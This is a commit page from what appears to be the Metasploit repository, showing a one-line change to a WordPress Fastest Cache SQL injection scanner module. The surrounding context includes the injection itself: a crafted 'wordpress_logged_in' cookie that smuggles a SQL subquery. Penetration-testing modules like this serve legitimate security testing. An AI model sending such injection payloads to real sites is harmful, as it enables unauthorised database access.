Skip to content

Commit a687a6c

Browse files
committed
Update modules/auxiliary/scanner/http/wp_fastest_cache_sqli.rb
1 parent 63c3a12 commit a687a6c

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

modules/auxiliary/scanner/http/wp_fastest_cache_sqli.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -57,7 +57,7 @@ def run_host(ip)
5757
res = send_request_cgi({
5858
'method' => 'GET',
5959
'cookie' => "wordpress_logged_in=\" AND (SELECT #{random_number} FROM (SELECT(#{payload}))#{random_table}) AND \"#{random_string}\"=\"#{random_string}",
60-
'uri' => normalize_uri(target_uri.path, 'wp-login.php')
60+
'uri' => normalize_uri(target_uri.path)
6161
})
6262
fail_with Failure::Unreachable, 'Connection failed' unless res
6363
end

0 commit comments

Comments
 (0)